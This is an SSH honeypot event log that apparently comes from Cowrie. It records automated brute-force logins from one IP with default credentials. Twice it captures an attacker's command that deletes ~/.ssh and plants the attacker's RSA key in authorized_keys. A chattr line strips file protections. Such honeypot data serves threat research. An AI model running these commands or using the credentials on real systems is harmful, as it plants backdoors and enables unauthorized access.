{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:32.610207Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:07:33.698223Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:07:33.698894Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:07:33.701437Z","src_ip":"212.227.235.229","session":"84a9ce5d61fa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:07:34.005932Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:34.007153Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55850,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c7f33f1abac","protocol":"ssh","message":"New connection: 212.227.235.229:55850 (1.2.3.4:22) [session: 1c7f33f1abac]","sensor":"my-vps","timestamp":"2025-08-28T16:07:34.321971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:07:34.323214Z","src_ip":"212.227.235.229","session":"1c7f33f1abac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:07:34.636880Z","src_ip":"212.227.235.229","session":"1c7f33f1abac"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:34.939598Z","src_ip":"212.227.235.229","session":"84a9ce5d61fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51590,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bc8f881c4c1","protocol":"ssh","message":"New connection: 212.227.235.229:51590 (1.2.3.4:22) [session: 5bc8f881c4c1]","sensor":"my-vps","timestamp":"2025-08-28T16:07:35.152435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:07:35.153348Z","src_ip":"212.227.235.229","session":"5bc8f881c4c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:07:35.378513Z","src_ip":"212.227.235.229","session":"5bc8f881c4c1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:07:35.940015Z","src_ip":"212.227.235.229","session":"1c7f33f1abac"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:07:36.319723Z","src_ip":"212.227.235.229","session":"5bc8f881c4c1"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:36.546575Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:36.547724Z","src_ip":"212.227.235.229","session":"5bc8f881c4c1"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:37.257091Z","src_ip":"212.227.235.229","session":"1c7f33f1abac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55852,"dst_ip":"1.2.3.4","dst_port":22,"session":"cca51fd5bce3","protocol":"ssh","message":"New connection: 212.227.235.229:55852 (1.2.3.4:22) [session: cca51fd5bce3]","sensor":"my-vps","timestamp":"2025-08-28T16:07:37.562370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:07:37.563333Z","src_ip":"212.227.235.229","session":"cca51fd5bce3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:07:37.868658Z","src_ip":"212.227.235.229","session":"cca51fd5bce3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:07:39.132273Z","src_ip":"212.227.235.229","session":"cca51fd5bce3"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:39.437901Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:39.439123Z","src_ip":"212.227.235.229","session":"cca51fd5bce3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50082,"dst_ip":"1.2.3.4","dst_port":22,"session":"d95992292620","protocol":"ssh","message":"New connection: 212.227.235.229:50082 (1.2.3.4:22) [session: d95992292620]","sensor":"my-vps","timestamp":"2025-08-28T16:07:57.391621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:07:57.392472Z","src_ip":"212.227.235.229","session":"d95992292620"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:07:57.614758Z","src_ip":"212.227.235.229","session":"d95992292620"}
{"eventid":"cowrie.login.failed","username":"webmin","password":"webmin","message":"login attempt [webmin/webmin] failed","sensor":"my-vps","timestamp":"2025-08-28T16:07:58.544039Z","src_ip":"212.227.235.229","session":"d95992292620"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:59.771276Z","src_ip":"212.227.235.229","session":"d95992292620"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46480,"dst_ip":"1.2.3.4","dst_port":22,"session":"40428f8498ab","protocol":"ssh","message":"New connection: 212.227.235.229:46480 (1.2.3.4:22) [session: 40428f8498ab]","sensor":"my-vps","timestamp":"2025-08-28T16:08:42.276646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:08:42.277527Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:08:42.489739Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.login.success","username":"root","password":"ABCabc123@","message":"login attempt [root/ABCabc123@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:08:43.379111Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:08:43.821073Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:08:43.821926Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:08:43.823079Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:08:44.036847Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:08:44.520928Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:08:44.521705Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:08:44.735667Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:08:44.736613Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47448,"dst_ip":"1.2.3.4","dst_port":22,"session":"68d4293e0977","protocol":"ssh","message":"New connection: 212.227.235.229:47448 (1.2.3.4:22) [session: 68d4293e0977]","sensor":"my-vps","timestamp":"2025-08-28T16:08:44.992825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:08:44.993494Z","src_ip":"212.227.235.229","session":"68d4293e0977"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:08:45.234860Z","src_ip":"212.227.235.229","session":"68d4293e0977"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:08:46.238839Z","src_ip":"212.227.235.229","session":"68d4293e0977"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:08:47.483602Z","src_ip":"212.227.235.229","session":"68d4293e0977"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48470,"dst_ip":"1.2.3.4","dst_port":22,"session":"0043d2384eef","protocol":"ssh","message":"New connection: 212.227.235.229:48470 (1.2.3.4:22) [session: 0043d2384eef]","sensor":"my-vps","timestamp":"2025-08-28T16:08:47.714024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:08:47.714810Z","src_ip":"212.227.235.229","session":"0043d2384eef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:08:47.951277Z","src_ip":"212.227.235.229","session":"0043d2384eef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:08:48.940493Z","src_ip":"212.227.235.229","session":"0043d2384eef"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:08:49.166199Z","src_ip":"212.227.235.229","session":"40428f8498ab"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:08:49.178389Z","src_ip":"212.227.235.229","session":"0043d2384eef"}
{"eventid":"cowrie.session.connect","src_ip":"161.35.112.121","src_port":49530,"dst_ip":"1.2.3.4","dst_port":22,"session":"c30a6e562cce","protocol":"ssh","message":"New connection: 161.35.112.121:49530 (1.2.3.4:22) [session: c30a6e562cce]","sensor":"my-vps","timestamp":"2025-08-28T16:08:53.593254Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58620,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd95ed91fcd7","protocol":"ssh","message":"New connection: 212.227.235.229:58620 (1.2.3.4:22) [session: bd95ed91fcd7]","sensor":"my-vps","timestamp":"2025-08-28T16:08:56.732081Z"}
